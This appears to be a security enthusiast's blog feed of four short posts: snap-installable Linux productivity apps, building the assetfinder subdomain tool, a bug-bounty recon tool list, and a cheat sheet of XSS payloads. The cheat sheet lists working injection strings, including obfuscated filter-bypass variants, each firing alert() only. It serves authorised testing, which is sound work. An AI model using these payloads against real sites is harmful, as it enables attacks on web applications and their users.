Forem: vala broumand

top 3 linux apps for productivity 🐧

vala broumand — Sat, 14 Jan 2023 08:53:27 +0000

Hi everyone , i hope you have a great day :) in this post i will introduce you cool apps for your productivity progress. ok let's get started!

1- Ora

Ora is a Task management and team collaboration app with
very cool features, this will help you improve your teamwork skills.

how to install? (it easy with snap)
sudo snap install ora

Official Website

2- Zenkit

A platform for collaboration and project management.

how to install ?
sudo snap install zenkit
Official website

3- Drawio

drawio is a tool for drawing flowcharts and diagrams and more....

how to install?
sudo snap install drawio

Official website

how to install assetfinder tool on any linunx distro 🐧

vala broumand — Mon, 02 Jan 2023 20:47:52 +0000

With this tool we can find domains and subdomains potentially related to a given domain. this tool is greatly useful in the asset discovery proccess.

1- first of all we should install go lang on our machine

sudo apt install go-lang -y

the command above is for Debian Based Linux distributions, if you are using a different distro find out how to install go.

check if the go lang installed successfully :

go version

if yes you should see something like this:

go version go1.18.1 linux/amd64

2- also we need git to be installed on our machine

sudo apt install git

check the git installation :

git --version

3-now change your directory and move to the downloads folder

cd Downloads

4- now we should clone the assetfinder repository from Tomnomnom github

git clone https://github.com/tomnomnom/assetfinder.git

5-now move into the assetfinder directory

cd assetfinder

6- create a go module

go mod init assetfinder

7-in this step we should build an executable go package with the command below

the dot sign means build the package in the current directory

go build .

8- now we should move the file to bin folder so we can access assetfinder from anywhere :D

sudo mv assetfinder /usr/local/bin/

and tada we are ready to hack !🗿

Useful XSS Payloads

vala broumand — Sun, 30 Oct 2022 07:34:51 +0000

In this post i will show top and useful xss payloads in 2022. i found xss vulnerabilities in many web apps with some of them below.

You can use payloads below when you are dealing with a injection that goes inside the value of a input:

\"-alert(1)//
\'-alert(1)//
%26apos;-alert(1)-%26apos
'-alert(1)-'

Use these payloads when you are injecting inside a script tag

</script><img/src/onerror=alert(1)>
<a href="javascript:var a='&apos;-alert(1)-&apos;'">

And we have some common payloads here

// Basic payload
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script>\u0061lert('22')</script>
<script>eval('\x61lert(\'33\')')</script>
<script>eval(8680439..toString(30))(983801..toString(36))</script> //parseInt("confirm",30) == 8680439 && 8680439..toString(30) == "confirm"
<object/data="jav&#x61;sc&#x72;ipt&#x3a;al&#x65;rt&#x28;23&#x29;">

// Img payload
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>

Find Security and Bug Bounty Books in my telegram channel ==>

t.me

Top Recon Tools

vala broumand — Sat, 29 Oct 2022 20:39:39 +0000

top recon tools i use for information gathering for #bug_bounty:

Amass

The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.
Github Link

Subfinder

subfinder is a subdomain discovery tool that returns valid subdomains for websites, using passive online sources. It has a simple, modular architecture and is optimized for speed. subfinder is built for doing one thing only - passive subdomain enumeration, and it does that very well.
Github Link

Nmap

Nmap is released under a custom license, which is based on (but not compatible with) GPLv2. The Nmap license allows free usage by end users, and we also offer a commercial license for companies that wish to redistribute Nmap technology with their products. See Nmap Copyright and Licensing for full details.
Github Link

Gospider

GoSpider - Fast web spider written in Go
Github Link

Gotator

this has massive features , Checks domain and TLD analyzing ccSLDs to avoid going out of scope (example.com, example.com.mx, etc.).
Github Link

Httpx

httpx is a fast and multi-purpose HTTP toolkit that allows running multiple probes using the retryablehttp library. It is designed to maintain result reliability with an increased number of threads.
Github Link

Wahtweb

Next generation web scanner
Github Link

What tool do you use ? :)
join my telegram channel for more -> @spi_sec